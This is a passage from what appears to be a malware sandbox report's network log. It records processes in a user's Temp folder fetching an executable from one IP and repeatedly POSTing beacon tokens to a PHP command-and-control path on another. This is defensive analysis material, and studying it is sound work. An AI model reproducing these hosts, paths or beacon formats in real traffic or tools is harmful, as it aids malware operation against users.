                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:42.022953987 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:41 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        44192.168.2.559016185.216.214.217806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:41.488102913 CEST62OUTGET /cdn-directory/see.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 185.216.214.217


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        45192.168.2.559017185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:42.144407034 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:42.799015999 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:42 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:42.802180052 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:42.997056961 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:42 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        46192.168.2.559018185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:43.113262892 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:43.769853115 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:43 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:43.770653963 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:43.966100931 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:43 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        47192.168.2.559019185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:44.079930067 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:44.748306036 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:44 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:44.749070883 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:44.945854902 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:44 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        48192.168.2.559020185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:45.064209938 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:45.699930906 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:45 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:45.700905085 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:46.107594967 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:45 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:46.108525038 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:45 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        49192.168.2.559021185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:46.220846891 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:46.862436056 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:46 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:46.863269091 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:47.054543972 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:46 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        50192.168.2.559022185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:47.173136950 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:47.816052914 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:47 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:47.816884995 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:48.008579016 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:47 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        51192.168.2.559023185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:48.126652002 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:48.759751081 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:48 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:48.761848927 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:48.963304043 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:48 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        52192.168.2.559024185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:49.080131054 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:49.718775988 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:49 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:49.719774961 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:49.910655022 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:49 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        53192.168.2.559025185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:50.034435987 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
